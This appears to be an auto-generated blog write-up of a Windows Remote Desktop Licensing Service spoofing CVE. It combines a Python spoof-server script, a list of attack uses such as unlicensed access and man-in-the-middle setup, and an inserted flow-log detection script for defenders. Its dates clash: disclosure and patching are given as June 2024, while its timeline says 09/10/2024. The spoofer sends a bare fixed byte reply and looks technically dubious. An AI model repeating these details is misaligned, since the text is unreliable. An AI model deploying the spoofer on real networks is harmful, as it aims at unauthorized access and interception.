CVE-2024-43455 - Windows Remote Desktop Licensing Service Spoofing Vulnerability – Analysis, Code Example, and Exploit Details
In June 2024, Microsoft disclosed a security flaw affecting its Remote Desktop Licensing Service (also known as the License Server) under the identifier CVE-2024-43455. This vulnerability allows an attacker to spoof the Licensing Service in a Windows environment, with potentially severe consequences, especially in environments relying on Remote Desktop Services (RDS) for remote access.
In this post, you’ll find an easy-to-understand explanation of CVE-2024-43455, a demonstration of the problem with code snippets, an outline of exploit details, and recommendations on how to stay safe.
## What is the Windows Remote Desktop Licensing Service?
The Remote Desktop Licensing Service helps manage and validate Remote Desktop client access licenses (RDS CALs). If attackers can trick systems into thinking they are a legitimate license server, they can weaken security measures, potentially allowing unauthorized users to access RDS infrastructure or perform further network attacks.
- Component Affected: Remote Desktop Licensing Service
- Impact: An attacker on the network could impersonate a legitimate licensing server, letting them trick clients and other services.
- CVSS Score: 7.6 (High)
- Patched In: June 2024 Patch Tuesday
## What’s the problem?
The Licensing Service does not fully verify the authenticity of license requests and responses, meaning it can accept responses from an attacker pretending to be the real server. Specifically, the lack of robust cryptographic checks allows an attacker on the same network to send crafted responses to RDS clients or servers.
1. The attacker places themselves on the same network as the target (e.g., internal LAN or via VPN).
2. The attacker listens for traffic between RDS clients/servers and the Licensing Service on port TCP/445 or TCP/135.
3. When a new licensing request is broadcast, the attacker responds before the legitimate server, delivering fake responses that get trusted.
## Example: Simulating the Attack
Here’s a simplified Python example showing how an attacker could listen and respond faster than the real licensing service. This is for educational purposes only.
```python
import socket

# Spoof Licensing Server - listens for license requests and replies with a fake response
# Licensing service typically uses port 135 (DCOM) or 445 (SMB)
LISTEN_PORT = 135
LIC_SERVICE_IP = '...'


def start_spoof_server():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((LIC_SERVICE_IP, LISTEN_PORT))
    s.listen(5)
    print(f"[*] Spoof Licensing Service running on port {LISTEN_PORT}...")
    while True:
        client_sock, addr = s.accept()
        print(f"[+] Licensing request from {addr}")
        # Here, we'd normally parse and see if this is really a licensing request.
        # For demo purposes, send an always-successful response.
        fake_license_response = b"\x01\x00\x00\x00"  # Mimic a "licensed" response
        client_sock.send(fake_license_response)
        client_sock.close()


if __name__ == '__main__':
    start_spoof_server()
```
- RDS Security Bypass: Allowing unlicensed access via a spoof license server.
- Man-in-the-Middle (MitM): Setting up for future attacks (stealing credentials, session hijacking).
- Trust Exploit: Faking audit logs, tracking, or compliance for licensed usage.
## How to Fix / Mitigate
Microsoft released a fix in June 2024 as part of their security updates. Apply all updates immediately.
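The attack described above depends on an RDS host accepting answers on TCP/135 or TCP/445 from a peer that is not the real license server, so flow logs can be checked for exactly that. The following is an added example, not code from the original post or from Microsoft; the flow-log format, addresses and allowlists are constructed assumptions to replace with your own inventory.

```python
import ipaddress

# Constructed inventory (assumptions): replace with your own addresses.
RDS_HOSTS = ipaddress.ip_network("10.0.20.0/24")   # RDS session hosts
LICENSE_SERVERS = {"10.0.10.5"}                    # approved RD license servers
KNOWN_PEERS = {"10.0.10.2", "10.0.10.3"}           # other expected RPC/SMB peers
WATCHED_PORTS = {135, 445}                         # ports named in the post

# Constructed flow records: "timestamp src dst dport proto"
SAMPLE_FLOWS = """\
2024-09-10T08:00:01Z 10.0.20.11 10.0.10.5 135 tcp
2024-09-10T08:00:02Z 10.0.20.11 10.0.10.2 445 tcp
2024-09-10T08:00:07Z 10.0.20.12 10.0.20.77 135 tcp
2024-09-10T08:00:09Z 10.0.20.12 10.0.10.5 3389 tcp
2024-09-10T08:00:12Z 10.0.30.4 10.0.20.77 445 tcp
malformed line
2024-09-10T08:00:15Z 10.0.20.13 192.168.50.9 445 tcp
"""

def parse_flow(line):
    """Return (ts, src, dst, dport), or None for lines that do not parse."""
    parts = line.split()
    if len(parts) != 5 or parts[4].lower() != "tcp":
        return None
    try:
        src = ipaddress.ip_address(parts[1])
        dst = ipaddress.ip_address(parts[2])
        dport = int(parts[3])
    except ValueError:
        return None
    return parts[0], src, dst, dport

def find_unexpected_peers(flow_text):
    """Flag RDS hosts reaching TCP/135 or TCP/445 on a host outside the allowlist."""
    allowed = {ipaddress.ip_address(a) for a in LICENSE_SERVERS | KNOWN_PEERS}
    alerts = []
    for line in flow_text.splitlines():
        flow = parse_flow(line)
        if flow is None:
            continue  # skip malformed or non-TCP records
        ts, src, dst, dport = flow
        if src in RDS_HOSTS and dport in WATCHED_PORTS and dst not in allowed:
            alerts.append((ts, str(src), str(dst), dport))
    return alerts

if __name__ == "__main__":
    for ts, src, dst, dport in find_unexpected_peers(SAMPLE_FLOWS):
        print(f"{ts} ALERT {src} -> {dst}:{dport} is not an approved peer")
```

An alert here means only that the peer is unexpected; confirm against the host inventory before treating it as a spoofed license server.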
## Conclusion
CVE-2024-43455 is a reminder that even “background” services like licensing servers can introduce critical vulnerabilities. If you run Windows Remote Desktop Services, patch your systems now and tighten network security around your licensing infrastructure.
Always keep your systems up to date and audit your network regularly.
## Timeline
Published on: 09/10/2024 17:15:32 UTC
Last modified on: 10/09/2024 01:26:37 UTC